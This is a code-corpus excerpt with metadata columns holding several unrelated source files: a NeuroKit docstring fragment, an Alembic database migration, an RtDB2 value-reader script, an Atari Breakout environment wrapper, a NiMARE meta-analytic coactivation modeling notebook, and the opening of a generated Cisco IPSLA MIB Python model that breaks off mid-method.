| en | 0.603918 | # -*- coding: utf-8 -*- Plot signal with events as vertical lines. Parameters ---------- signal : array or DataFrame Signal array (can be a dataframe with many signals). sampling_rate : int The sampling frequency of the signal (in Hz, i.e., samples/second). Needs to be supplied if the data should be plotted over time in seconds. Otherwise the data is plotted over samples. Defaults to None. subplots : bool If True, each signal is plotted in a subplot. standardize : bool If True, all signals will have the same scale (useful for visualisation). labels : str or list Defaults to None. **kwargs : optional Arguments passed to matplotlib plotting. Examples ---------- >>> import numpy as np >>> import pandas as pd >>> import neurokit2 as nk >>> >>> signal = nk.signal_simulate(duration=10, sampling_rate=1000) >>> nk.signal_plot(signal, sampling_rate=1000, color="red") >>> >>> data = pd.DataFrame({"Signal2": np.cos(np.linspace(start=0, stop=20, num=1000)), ... "Signal3": np.sin(np.linspace(start=0, stop=20, num=1000)), ... "Signal4": nk.signal_binarize(np.cos(np.linspace(start=0, stop=40, num=1000)))}) >>> nk.signal_plot(data, labels=['signal_1', 'signal_2', 'signal_3'], subplots=True) >>> nk.signal_plot([signal, data], standardize=True) # Sanitize format # If list is passed # If vector is passed # Copy signal # Guess continuous and events columns # Adjust for sampling rate # x_axis = np.linspace(0, signal.shape[0] / sampling_rate, signal.shape[0]) # x_axis = pd.DataFrame(x_axis, columns=["Time (s)"]) # signal = pd.concat([signal, x_axis], axis=1) # signal = signal.set_index("Time (s)") # Plot accordingly # Aesthetics # Plot # Tidy legend locations and add labels | 3.479799 | 3 |
migrations/versions/1a89721126f7_only_one_validation_per_mission_user_.py | MTES-MCT/mobilic-api | 0 | 8046 | """Only one validation per mission, user and actor
Revision ID: <KEY>
Revises: <KEY>
Create Date: 2021-10-14 11:22:01.124488
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = "<KEY>"
down_revision = "<KEY>"
branch_labels = None
depends_on = None
def upgrade():
op.execute(
"""
WITH validation_duplicates AS (
SELECT
id,
ROW_NUMBER() OVER (PARTITION BY user_id, mission_id, submitter_id ORDER BY reception_time DESC) AS rn
FROM mission_validation
)
DELETE FROM mission_validation mv
USING validation_duplicates vd
WHERE mv.id = vd.id AND vd.rn >= 2
"""
)
op.execute(
"""
ALTER TABLE mission_validation ADD CONSTRAINT only_one_validation_per_submitter_mission_and_user
EXCLUDE USING GIST (
mission_id WITH =,
submitter_id WITH =,
user_id WITH =
)
"""
)
def downgrade():
op.drop_constraint(
"only_one_validation_per_submitter_mission_and_user",
"mission_validation",
)
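
# Editor's note (not part of the original migration): the EXCLUDE USING GIST
# constraint above compares integer columns with "=", which relies on the
# btree_gist extension being available in the database. If it is not already
# enabled by an earlier migration, a hypothetical upgrade step such as
#
#     op.execute("CREATE EXTENSION IF NOT EXISTS btree_gist")
#
# would need to run before the constraint is added.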
| """Only one validation per mission, user and actor
Revision ID: <KEY>
Revises: <KEY>
Create Date: 2021-10-14 11:22:01.124488
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = "<KEY>"
down_revision = "<KEY>"
branch_labels = None
depends_on = None
def upgrade():
op.execute(
"""
WITH validation_duplicates AS (
SELECT
id,
ROW_NUMBER() OVER (PARTITION BY user_id, mission_id, submitter_id ORDER BY reception_time DESC) AS rn
FROM mission_validation
)
DELETE FROM mission_validation mv
USING validation_duplicates vd
WHERE mv.id = vd.id AND vd.rn >= 2
"""
)
op.execute(
"""
ALTER TABLE mission_validation ADD CONSTRAINT only_one_validation_per_submitter_mission_and_user
EXCLUDE USING GIST (
mission_id WITH =,
submitter_id WITH =,
user_id WITH =
)
"""
)
def downgrade():
op.drop_constraint(
"only_one_validation_per_submitter_mission_and_user",
"mission_validation",
)
| en | 0.550867 | Only one validation per mission, user and actor Revision ID: <KEY> Revises: <KEY> Create Date: 2021-10-14 11:22:01.124488 # revision identifiers, used by Alembic. WITH validation_duplicates AS ( SELECT id, ROW_NUMBER() OVER (PARTITION BY user_id, mission_id, submitter_id ORDER BY reception_time DESC) AS rn FROM mission_validation ) DELETE FROM mission_validation mv USING validation_duplicates vd WHERE mv.id = vd.id AND vd.rn >= 2 ALTER TABLE mission_validation ADD CONSTRAINT only_one_validation_per_submitter_mission_and_user EXCLUDE USING GIST ( mission_id WITH =, submitter_id WITH =, user_id WITH = ) | 1.486342 | 1 |
packages/facilities/rtdb/python/rtdb2_get.py | Falcons-Robocup/code | 2 | 8047 | # Copyright 2020 <NAME> (Falcons)
# SPDX-License-Identifier: Apache-2.0
#!/usr/bin/python
import os
import sys
import argparse
from rtdb2 import RtDB2Store, RTDB2_DEFAULT_PATH
import rtdb2tools
from hexdump import hexdump
# Main structure of the program
if __name__ == "__main__":
# Argument parsing.
descriptionTxt = 'This tool reads a value from the database given an RtDB key.\n'
exampleTxt = """Example: rtdb2_get.py -a 6 ROBOT_STATE
age: 2h
shared: True
list: False
value: [2, [1581172987, 618438], [0.05368572473526001, -0.2938263416290283, 5.330356597900391], [0.1385340541601181, -0.8020891547203064, 0.7817431688308716], False, [0.0, 0.0], 6, 'A']
Example: rtdb2_get.py -a 2 DIAG_WORLDMODEL_LOCAL -x "['balls'][0]['result']"
[[5.3209381103515625, 0.5837346315383911, 0.15281200408935547], [-0.0029433025047183037, 0.01433953270316124, 1.2758345292240847e-05], 1.0, [22033, 1889585904]]
"""
parser = argparse.ArgumentParser(description=descriptionTxt, epilog=exampleTxt, formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('-a', '--agent', help='agent ID to use', type=int, default=rtdb2tools.guessAgentId())
parser.add_argument('-s', '--serialized', help='also show serialized string (as hexdump)', action='store_true')
parser.add_argument('-p', '--path', help='database path to use', type=str, default=RTDB2_DEFAULT_PATH)
parser.add_argument('-x', '--expression', help='evaluate expression, useful to fetch a specific element', type=str)
parser.add_argument('key', help='RtDB key to read')
args = parser.parse_args()
# Create instance of RtDB2Store and read databases from disk
rtdb2Store = RtDB2Store(args.path)
item = rtdb2Store.get(args.agent, args.key, timeout=None)
if args.expression:
print(eval("item.value" + args.expression))
else:
print(str(item))
if args.serialized:
hexdump(item.value_serialized)
rtdb2Store.closeAll()
| # Copyright 2020 <NAME> (Falcons)
# SPDX-License-Identifier: Apache-2.0
#!/usr/bin/python
import os
import sys
import argparse
from rtdb2 import RtDB2Store, RTDB2_DEFAULT_PATH
import rtdb2tools
from hexdump import hexdump
# Main structure of the program
if __name__ == "__main__":
# Argument parsing.
descriptionTxt = 'This tool reads a value from the database given an RtDB key.\n'
exampleTxt = """Example: rtdb2_get.py -a 6 ROBOT_STATE
age: 2h
shared: True
list: False
value: [2, [1581172987, 618438], [0.05368572473526001, -0.2938263416290283, 5.330356597900391], [0.1385340541601181, -0.8020891547203064, 0.7817431688308716], False, [0.0, 0.0], 6, 'A']
Example: rtdb2_get.py -a 2 DIAG_WORLDMODEL_LOCAL -x "['balls'][0]['result']"
[[5.3209381103515625, 0.5837346315383911, 0.15281200408935547], [-0.0029433025047183037, 0.01433953270316124, 1.2758345292240847e-05], 1.0, [22033, 1889585904]]
"""
parser = argparse.ArgumentParser(description=descriptionTxt, epilog=exampleTxt, formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('-a', '--agent', help='agent ID to use', type=int, default=rtdb2tools.guessAgentId())
parser.add_argument('-s', '--serialized', help='also show serialized string (as hexdump)', action='store_true')
parser.add_argument('-p', '--path', help='database path to use', type=str, default=RTDB2_DEFAULT_PATH)
parser.add_argument('-x', '--expression', help='evaluate expression, useful to fetch a specific element', type=str)
parser.add_argument('key', help='RtDB key to read')
args = parser.parse_args()
# Create instance of RtDB2Store and read databases from disk
rtdb2Store = RtDB2Store(args.path)
item = rtdb2Store.get(args.agent, args.key, timeout=None)
if args.expression:
print(eval("item.value" + args.expression))
else:
print(str(item))
if args.serialized:
hexdump(item.value_serialized)
rtdb2Store.closeAll()
| en | 0.436715 | # Copyright 2020 <NAME> (Falcons) # SPDX-License-Identifier: Apache-2.0 #!/usr/bin/python # Main structure of the program # Argument parsing. Example: rtdb2_get.py -a 6 ROBOT_STATE age: 2h shared: True list: False value: [2, [1581172987, 618438], [0.05368572473526001, -0.2938263416290283, 5.330356597900391], [0.1385340541601181, -0.8020891547203064, 0.7817431688308716], False, [0.0, 0.0], 6, 'A'] Example: rtdb2_get.py -a 2 DIAG_WORLDMODEL_LOCAL -x "['balls'][0]['result']" [[5.3209381103515625, 0.5837346315383911, 0.15281200408935547], [-0.0029433025047183037, 0.01433953270316124, 1.2758345292240847e-05], 1.0, [22033, 1889585904]] # Create instance of RtDB2Store and read databases from disk | 2.525046 | 3 |
algorithms/A3C/atari/atari_env_deprecated.py | what3versin/reinforce_py | 1 | 8048 | from __future__ import print_function
from __future__ import division
import os
import gym
import numpy as np
from skimage.transform import resize
from skimage.color import rgb2gray
class Atari(object):
s_dim = [84, 84, 1]
a_dim = 3
def __init__(self, args, record_video=False):
self.env = gym.make('BreakoutNoFrameskip-v4')
self.ale = self.env.env.ale # ale interface
if record_video:
video_dir = os.path.join(args.save_path, 'videos')
if not os.path.exists(video_dir):
os.makedirs(video_dir)
self.env = gym.wrappers.Monitor(
self.env, video_dir, video_callable=lambda x: True, resume=True)
self.ale = self.env.env.env.ale
self.screen_size = Atari.s_dim[:2] # 84x84
self.noop_max = 30
self.frame_skip = 4
self.frame_feq = 4
self.s_dim = Atari.s_dim
self.a_dim = Atari.a_dim
self.action_space = [1, 2, 3] # Breakout specify
self.done = True
def new_round(self):
if not self.done: # dead but not done
# no-op step to advance from terminal/lost life state
obs, _, _, _ = self.env.step(0)
obs = self.preprocess(obs)
else: # terminal
self.env.reset()
# No-op
for _ in range(np.random.randint(1, self.noop_max + 1)):
obs, _, done, _ = self.env.step(0)
obs = self.preprocess(obs)
        # Initialize the rolling frame stack; step() shifts new frames into it
        self.state = np.reshape(obs, newshape=self.screen_size + [1])
        return obs
def preprocess(self, observ):
return resize(rgb2gray(observ), self.screen_size)
def step(self, action):
observ, reward, dead = None, 0, False
for _ in range(self.frame_skip):
lives_before = self.ale.lives()
o, r, self.done, _ = self.env.step(self.action_space[action])
lives_after = self.ale.lives()
reward += r
if lives_before > lives_after:
dead = True
break
observ = self.preprocess(o)
observ = np.reshape(observ, newshape=self.screen_size + [1])
self.state = np.append(self.state[:, :, 1:], observ, axis=2)
return self.state, reward, dead, self.done
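
if __name__ == "__main__":
    # Editor's sketch (not part of the original module): a minimal random-agent
    # loop. `args` is only read when record_video=True, so None is passed here;
    # running this requires gym with the Atari/ALE environments installed.
    env = Atari(None)
    state = env.new_round()
    for _ in range(100):
        action = np.random.randint(Atari.a_dim)
        state, reward, dead, done = env.step(action)
        if dead:
            state = env.new_round()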
| from __future__ import print_function
from __future__ import division
import os
import gym
import numpy as np
from skimage.transform import resize
from skimage.color import rgb2gray
class Atari(object):
s_dim = [84, 84, 1]
a_dim = 3
def __init__(self, args, record_video=False):
self.env = gym.make('BreakoutNoFrameskip-v4')
self.ale = self.env.env.ale # ale interface
if record_video:
video_dir = os.path.join(args.save_path, 'videos')
if not os.path.exists(video_dir):
os.makedirs(video_dir)
self.env = gym.wrappers.Monitor(
self.env, video_dir, video_callable=lambda x: True, resume=True)
self.ale = self.env.env.env.ale
self.screen_size = Atari.s_dim[:2] # 84x84
self.noop_max = 30
self.frame_skip = 4
self.frame_feq = 4
self.s_dim = Atari.s_dim
self.a_dim = Atari.a_dim
self.action_space = [1, 2, 3] # Breakout specify
self.done = True
def new_round(self):
if not self.done: # dead but not done
# no-op step to advance from terminal/lost life state
obs, _, _, _ = self.env.step(0)
obs = self.preprocess(obs)
else: # terminal
self.env.reset()
# No-op
for _ in range(np.random.randint(1, self.noop_max + 1)):
obs, _, done, _ = self.env.step(0)
obs = self.preprocess(obs)
        # Initialize the rolling frame stack; step() shifts new frames into it
        self.state = np.reshape(obs, newshape=self.screen_size + [1])
        return obs
def preprocess(self, observ):
return resize(rgb2gray(observ), self.screen_size)
def step(self, action):
observ, reward, dead = None, 0, False
for _ in range(self.frame_skip):
lives_before = self.ale.lives()
o, r, self.done, _ = self.env.step(self.action_space[action])
lives_after = self.ale.lives()
reward += r
if lives_before > lives_after:
dead = True
break
observ = self.preprocess(o)
observ = np.reshape(observ, newshape=self.screen_size + [1])
self.state = np.append(self.state[:, :, 1:], observ, axis=2)
return self.state, reward, dead, self.done
| en | 0.407234 | # ale interface # 84x84 # Breakout specify # dead but not done # no-op step to advance from terminal/lost life state # terminal # No-op | 2.579429 | 3 |
content/_build/jupyter_execute/macm.py | NBCLab/nimare-paper | 3 | 8049 | <reponame>NBCLab/nimare-paper
#!/usr/bin/env python
# coding: utf-8
# # Meta-Analytic Coactivation Modeling
# In[1]:
# First, import the necessary modules and functions
import os
from datetime import datetime
import matplotlib.pyplot as plt
from myst_nb import glue
from repo2data.repo2data import Repo2Data
import nimare
start = datetime.now()
# Install the data if running locally, or points to cached data if running on neurolibre
DATA_REQ_FILE = os.path.join("../binder/data_requirement.json")
FIG_DIR = os.path.abspath("../images")
# Download data
repo2data = Repo2Data(DATA_REQ_FILE)
data_path = repo2data.install()
data_path = os.path.join(data_path[0], "data")
# Now, load the Datasets we will use in this chapter
neurosynth_dset = nimare.dataset.Dataset.load(os.path.join(data_path, "neurosynth_dataset.pkl.gz"))
# Meta-analytic coactivation modeling (MACM) {cite:p}`Laird2009-gc,Robinson2010-iv,Eickhoff2010-vx`, also known as meta-analytic connectivity modeling, uses meta-analytic data to measure co-occurrence of activations between brain regions providing evidence of functional connectivity of brain regions across tasks.
# In coordinate-based MACM, whole-brain studies within the database are selected based on whether or not they report at least one peak in a region of interest specified for the analysis.
# These studies are then subjected to a meta-analysis, often comparing the selected studies to those remaining in the database.
# In this way, the significance of each voxel in the analysis corresponds to whether there is greater convergence of foci at the voxel among studies which also report foci in the region of interest than those which do not.
#
# <!-- TODO: Determine appropriate citation style here. -->
#
# MACM results have historically been accorded a similar interpretation to task-related functional connectivity (e.g., {cite:p}`Hok2015-lt,Kellermann2013-en`), although this approach is quite removed from functional connectivity analyses of task fMRI data (e.g., beta-series correlations, psychophysiological interactions, or even seed-to-voxel functional connectivity analyses on task data).
# Nevertheless, MACM analyses do show high correspondence with resting-state functional connectivity {cite:p}`Reid2017-ez`.
# MACM has been used to characterize the task-based functional coactivation of the cerebellum {cite:p}`Riedel2015-tx`, lateral prefrontal cortex {cite:p}`Reid2016-ba`, fusiform gyrus {cite:p}`Caspers2014-ja`, and several other brain regions.
#
# Within NiMARE, MACMs can be performed by selecting studies in a Dataset based on the presence of activation within a target mask or coordinate-centered sphere.
#
# In this section, we will perform two MACMs: one with a target mask and one with a coordinate-centered sphere.
# For the former, we use {py:meth}`nimare.dataset.Dataset.get_studies_by_mask`.
# For the latter, we use {py:meth}`nimare.dataset.Dataset.get_studies_by_coordinate`.
# In[2]:
# Create Dataset only containing studies with peaks within the amygdala mask
amygdala_mask = os.path.join(data_path, "amygdala_roi.nii.gz")
amygdala_ids = neurosynth_dset.get_studies_by_mask(amygdala_mask)
dset_amygdala = neurosynth_dset.slice(amygdala_ids)
# Create Dataset only containing studies with peaks within the sphere ROI
sphere_ids = neurosynth_dset.get_studies_by_coordinate([[24, -2, -20]], r=6)
dset_sphere = neurosynth_dset.slice(sphere_ids)
# In[3]:
import numpy as np
from nilearn import input_data, plotting
# In order to plot a sphere with a precise radius around a coordinate with
# nilearn, we need to use a NiftiSpheresMasker
mask_img = neurosynth_dset.masker.mask_img
sphere_masker = input_data.NiftiSpheresMasker([[24, -2, -20]], radius=6, mask_img=mask_img)
sphere_masker.fit(mask_img)
sphere_img = sphere_masker.inverse_transform(np.array([[1]]))
fig, axes = plt.subplots(figsize=(6, 4), nrows=2)
display = plotting.plot_roi(
amygdala_mask,
annotate=False,
draw_cross=False,
axes=axes[0],
figure=fig,
)
axes[0].set_title("Amygdala ROI")
display = plotting.plot_roi(
sphere_img,
annotate=False,
draw_cross=False,
axes=axes[1],
figure=fig,
)
axes[1].set_title("Spherical ROI")
glue("figure_macm_rois", fig, display=False)
# ```{glue:figure} figure_macm_rois
# :name: figure_macm_rois
# :align: center
#
# Region of interest masks for (1) a target mask-based MACM and (2) a coordinate-based MACM.
# ```
# Once the `Dataset` has been reduced to studies with coordinates within the mask or sphere requested, any of the supported CBMA Estimators can be run.
# In[4]:
from nimare import meta
meta_amyg = meta.cbma.ale.ALE(kernel__sample_size=20)
results_amyg = meta_amyg.fit(dset_amygdala)
meta_sphere = meta.cbma.ale.ALE(kernel__sample_size=20)
results_sphere = meta_sphere.fit(dset_sphere)
# In[5]:
meta_results = {
"Amygdala ALE MACM": results_amyg.get_map("z", return_type="image"),
"Sphere ALE MACM": results_sphere.get_map("z", return_type="image"),
}
fig, axes = plt.subplots(figsize=(6, 4), nrows=2)
for i_meta, (name, file_) in enumerate(meta_results.items()):
display = plotting.plot_stat_map(
file_,
annotate=False,
axes=axes[i_meta],
cmap="Reds",
cut_coords=[24, -2, -20],
draw_cross=False,
figure=fig,
)
axes[i_meta].set_title(name)
colorbar = display._cbar
colorbar_ticks = colorbar.get_ticks()
if colorbar_ticks[0] < 0:
new_ticks = [colorbar_ticks[0], 0, colorbar_ticks[-1]]
else:
new_ticks = [colorbar_ticks[0], colorbar_ticks[-1]]
colorbar.set_ticks(new_ticks, update_ticks=True)
glue("figure_macm", fig, display=False)
# ```{glue:figure} figure_macm
# :name: figure_macm
# :align: center
#
# Unthresholded z-statistic maps for (1) the target mask-based MACM and (2) the coordinate-based MACM.
# ```
# In[6]:
end = datetime.now()
print(f"macm.md took {end - start} to build.")
| #!/usr/bin/env python
# coding: utf-8
# # Meta-Analytic Coactivation Modeling
# In[1]:
# First, import the necessary modules and functions
import os
from datetime import datetime
import matplotlib.pyplot as plt
from myst_nb import glue
from repo2data.repo2data import Repo2Data
import nimare
start = datetime.now()
# Install the data if running locally, or points to cached data if running on neurolibre
DATA_REQ_FILE = os.path.join("../binder/data_requirement.json")
FIG_DIR = os.path.abspath("../images")
# Download data
repo2data = Repo2Data(DATA_REQ_FILE)
data_path = repo2data.install()
data_path = os.path.join(data_path[0], "data")
# Now, load the Datasets we will use in this chapter
neurosynth_dset = nimare.dataset.Dataset.load(os.path.join(data_path, "neurosynth_dataset.pkl.gz"))
# Meta-analytic coactivation modeling (MACM) {cite:p}`Laird2009-gc,Robinson2010-iv,Eickhoff2010-vx`, also known as meta-analytic connectivity modeling, uses meta-analytic data to measure co-occurrence of activations between brain regions providing evidence of functional connectivity of brain regions across tasks.
# In coordinate-based MACM, whole-brain studies within the database are selected based on whether or not they report at least one peak in a region of interest specified for the analysis.
# These studies are then subjected to a meta-analysis, often comparing the selected studies to those remaining in the database.
# In this way, the significance of each voxel in the analysis corresponds to whether there is greater convergence of foci at the voxel among studies which also report foci in the region of interest than those which do not.
#
# <!-- TODO: Determine appropriate citation style here. -->
#
# MACM results have historically been accorded a similar interpretation to task-related functional connectivity (e.g., {cite:p}`Hok2015-lt,Kellermann2013-en`), although this approach is quite removed from functional connectivity analyses of task fMRI data (e.g., beta-series correlations, psychophysiological interactions, or even seed-to-voxel functional connectivity analyses on task data).
# Nevertheless, MACM analyses do show high correspondence with resting-state functional connectivity {cite:p}`Reid2017-ez`.
# MACM has been used to characterize the task-based functional coactivation of the cerebellum {cite:p}`Riedel2015-tx`, lateral prefrontal cortex {cite:p}`Reid2016-ba`, fusiform gyrus {cite:p}`Caspers2014-ja`, and several other brain regions.
#
# Within NiMARE, MACMs can be performed by selecting studies in a Dataset based on the presence of activation within a target mask or coordinate-centered sphere.
#
# In this section, we will perform two MACMs: one with a target mask and one with a coordinate-centered sphere.
# For the former, we use {py:meth}`nimare.dataset.Dataset.get_studies_by_mask`.
# For the latter, we use {py:meth}`nimare.dataset.Dataset.get_studies_by_coordinate`.
# In[2]:
# Create Dataset only containing studies with peaks within the amygdala mask
amygdala_mask = os.path.join(data_path, "amygdala_roi.nii.gz")
amygdala_ids = neurosynth_dset.get_studies_by_mask(amygdala_mask)
dset_amygdala = neurosynth_dset.slice(amygdala_ids)
# Create Dataset only containing studies with peaks within the sphere ROI
sphere_ids = neurosynth_dset.get_studies_by_coordinate([[24, -2, -20]], r=6)
dset_sphere = neurosynth_dset.slice(sphere_ids)
# In[3]:
import numpy as np
from nilearn import input_data, plotting
# In order to plot a sphere with a precise radius around a coordinate with
# nilearn, we need to use a NiftiSpheresMasker
mask_img = neurosynth_dset.masker.mask_img
sphere_masker = input_data.NiftiSpheresMasker([[24, -2, -20]], radius=6, mask_img=mask_img)
sphere_masker.fit(mask_img)
sphere_img = sphere_masker.inverse_transform(np.array([[1]]))
fig, axes = plt.subplots(figsize=(6, 4), nrows=2)
display = plotting.plot_roi(
amygdala_mask,
annotate=False,
draw_cross=False,
axes=axes[0],
figure=fig,
)
axes[0].set_title("Amygdala ROI")
display = plotting.plot_roi(
sphere_img,
annotate=False,
draw_cross=False,
axes=axes[1],
figure=fig,
)
axes[1].set_title("Spherical ROI")
glue("figure_macm_rois", fig, display=False)
# ```{glue:figure} figure_macm_rois
# :name: figure_macm_rois
# :align: center
#
# Region of interest masks for (1) a target mask-based MACM and (2) a coordinate-based MACM.
# ```
# Once the `Dataset` has been reduced to studies with coordinates within the mask or sphere requested, any of the supported CBMA Estimators can be run.
# In[4]:
from nimare import meta
meta_amyg = meta.cbma.ale.ALE(kernel__sample_size=20)
results_amyg = meta_amyg.fit(dset_amygdala)
meta_sphere = meta.cbma.ale.ALE(kernel__sample_size=20)
results_sphere = meta_sphere.fit(dset_sphere)
# In[5]:
meta_results = {
"Amygdala ALE MACM": results_amyg.get_map("z", return_type="image"),
"Sphere ALE MACM": results_sphere.get_map("z", return_type="image"),
}
fig, axes = plt.subplots(figsize=(6, 4), nrows=2)
for i_meta, (name, file_) in enumerate(meta_results.items()):
display = plotting.plot_stat_map(
file_,
annotate=False,
axes=axes[i_meta],
cmap="Reds",
cut_coords=[24, -2, -20],
draw_cross=False,
figure=fig,
)
axes[i_meta].set_title(name)
colorbar = display._cbar
colorbar_ticks = colorbar.get_ticks()
if colorbar_ticks[0] < 0:
new_ticks = [colorbar_ticks[0], 0, colorbar_ticks[-1]]
else:
new_ticks = [colorbar_ticks[0], colorbar_ticks[-1]]
colorbar.set_ticks(new_ticks, update_ticks=True)
glue("figure_macm", fig, display=False)
# ```{glue:figure} figure_macm
# :name: figure_macm
# :align: center
#
# Unthresholded z-statistic maps for (1) the target mask-based MACM and (2) the coordinate-based MACM.
# ```
# In[6]:
end = datetime.now()
print(f"macm.md took {end - start} to build.") | en | 0.817132 | #!/usr/bin/env python # coding: utf-8 # # Meta-Analytic Coactivation Modeling # In[1]: # First, import the necessary modules and functions # Install the data if running locally, or points to cached data if running on neurolibre # Download data # Now, load the Datasets we will use in this chapter # Meta-analytic coactivation modeling (MACM) {cite:p}`Laird2009-gc,Robinson2010-iv,Eickhoff2010-vx`, also known as meta-analytic connectivity modeling, uses meta-analytic data to measure co-occurrence of activations between brain regions providing evidence of functional connectivity of brain regions across tasks. # In coordinate-based MACM, whole-brain studies within the database are selected based on whether or not they report at least one peak in a region of interest specified for the analysis. # These studies are then subjected to a meta-analysis, often comparing the selected studies to those remaining in the database. # In this way, the significance of each voxel in the analysis corresponds to whether there is greater convergence of foci at the voxel among studies which also report foci in the region of interest than those which do not. # # <!-- TODO: Determine appropriate citation style here. --> # # MACM results have historically been accorded a similar interpretation to task-related functional connectivity (e.g., {cite:p}`Hok2015-lt,Kellermann2013-en`), although this approach is quite removed from functional connectivity analyses of task fMRI data (e.g., beta-series correlations, psychophysiological interactions, or even seed-to-voxel functional connectivity analyses on task data). # Nevertheless, MACM analyses do show high correspondence with resting-state functional connectivity {cite:p}`Reid2017-ez`. # MACM has been used to characterize the task-based functional coactivation of the cerebellum {cite:p}`Riedel2015-tx`, lateral prefrontal cortex {cite:p}`Reid2016-ba`, fusiform gyrus {cite:p}`Caspers2014-ja`, and several other brain regions. # # Within NiMARE, MACMs can be performed by selecting studies in a Dataset based on the presence of activation within a target mask or coordinate-centered sphere. # # In this section, we will perform two MACMs- one with a target mask and one with a coordinate-centered sphere. # For the former, we use {py:meth}`nimare.dataset.Dataset.get_studies_by_mask`. # For the latter, we use {py:meth}`nimare.dataset.Dataset.get_studies_by_coordinate`. # In[2]: # Create Dataset only containing studies with peaks within the amygdala mask # Create Dataset only containing studies with peaks within the sphere ROI # In[3]: # In order to plot a sphere with a precise radius around a coordinate with # nilearn, we need to use a NiftiSpheresMasker # ```{glue:figure} figure_macm_rois # :name: figure_macm_rois # :align: center # # Region of interest masks for (1) a target mask-based MACM and (2) a coordinate-based MACM. # ``` # Once the `Dataset` has been reduced to studies with coordinates within the mask or sphere requested, any of the supported CBMA Estimators can be run. # In[4]: # In[5]: # ```{glue:figure} figure_macm # :name: figure_macm # :align: center # # Unthresholded z-statistic maps for (1) the target mask-based MACM and (2) the coordinate-based MACM. # ``` # In[6]: | 2.356604 | 2 |
cisco-ios-xe/ydk/models/cisco_ios_xe/CISCO_IPSLA_ECHO_MIB.py | Maikor/ydk-py | 0 | 8050 | <filename>cisco-ios-xe/ydk/models/cisco_ios_xe/CISCO_IPSLA_ECHO_MIB.py
""" CISCO_IPSLA_ECHO_MIB
This MIB module defines the templates for IP SLA operations of
ICMP echo, UDP echo and TCP connect.
The ICMP echo operation measures end\-to\-end response time between
a Cisco router and any IP enabled device by computing the time
taken between sending an ICMP echo request message to the
destination and receiving an ICMP echo reply.
The UDP echo operation measures end\-to\-end response time between
a Cisco router and any IP enabled device by computing the time
taken between sending a UDP echo request message to the
destination and receiving a UDP echo reply.
The TCP connect operation measures end\-to\-end response time between
a Cisco router and any IP enabled device by computing the time
taken to perform a TCP connect operation.
"""
from collections import OrderedDict
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class CISCOIPSLAECHOMIB(Entity):
"""
.. attribute:: cipslaicmpechotmpltable
A table that contains ICMP echo template definitions
**type**\: :py:class:`CipslaIcmpEchoTmplTable <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable>`
.. attribute:: cipslaudpechotmpltable
A table that contains UDP echo template specific definitions
**type**\: :py:class:`CipslaUdpEchoTmplTable <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable>`
.. attribute:: cipslatcpconntmpltable
A table that contains TCP connect template specific definitions
**type**\: :py:class:`CipslaTcpConnTmplTable <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB, self).__init__()
self._top_entity = None
self.yang_name = "CISCO-IPSLA-ECHO-MIB"
self.yang_parent_name = "CISCO-IPSLA-ECHO-MIB"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("cipslaIcmpEchoTmplTable", ("cipslaicmpechotmpltable", CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable)), ("cipslaUdpEchoTmplTable", ("cipslaudpechotmpltable", CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable)), ("cipslaTcpConnTmplTable", ("cipslatcpconntmpltable", CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable))])
self._leafs = OrderedDict()
self.cipslaicmpechotmpltable = CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable()
self.cipslaicmpechotmpltable.parent = self
self._children_name_map["cipslaicmpechotmpltable"] = "cipslaIcmpEchoTmplTable"
self.cipslaudpechotmpltable = CISCOIPSLAECHOMIB.CipslaUdpEchoTmplTable()
self.cipslaudpechotmpltable.parent = self
self._children_name_map["cipslaudpechotmpltable"] = "cipslaUdpEchoTmplTable"
self.cipslatcpconntmpltable = CISCOIPSLAECHOMIB.CipslaTcpConnTmplTable()
self.cipslatcpconntmpltable.parent = self
self._children_name_map["cipslatcpconntmpltable"] = "cipslaTcpConnTmplTable"
self._segment_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(CISCOIPSLAECHOMIB, [], name, value)
class CipslaIcmpEchoTmplTable(Entity):
"""
A table that contains ICMP echo template definitions.
.. attribute:: cipslaicmpechotmplentry
A row entry representing an IPSLA ICMP echo template
**type**\: list of :py:class:`CipslaIcmpEchoTmplEntry <ydk.models.cisco_ios_xe.CISCO_IPSLA_ECHO_MIB.CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry>`
"""
_prefix = 'CISCO-IPSLA-ECHO-MIB'
_revision = '2007-08-16'
def __init__(self):
super(CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable, self).__init__()
self.yang_name = "cipslaIcmpEchoTmplTable"
self.yang_parent_name = "CISCO-IPSLA-ECHO-MIB"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("cipslaIcmpEchoTmplEntry", ("cipslaicmpechotmplentry", CISCOIPSLAECHOMIB.CipslaIcmpEchoTmplTable.CipslaIcmpEchoTmplEntry))])
self._leafs = OrderedDict()
self.cipslaicmpechotmplentry = YList(self)
self._segment_path = lambda: "cipslaIcmpEchoTmplTable"
self._absolute_path = lambda: "CISCO-IPSLA-ECHO-MIB:CISCO-IPSLA-ECHO-MIB/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
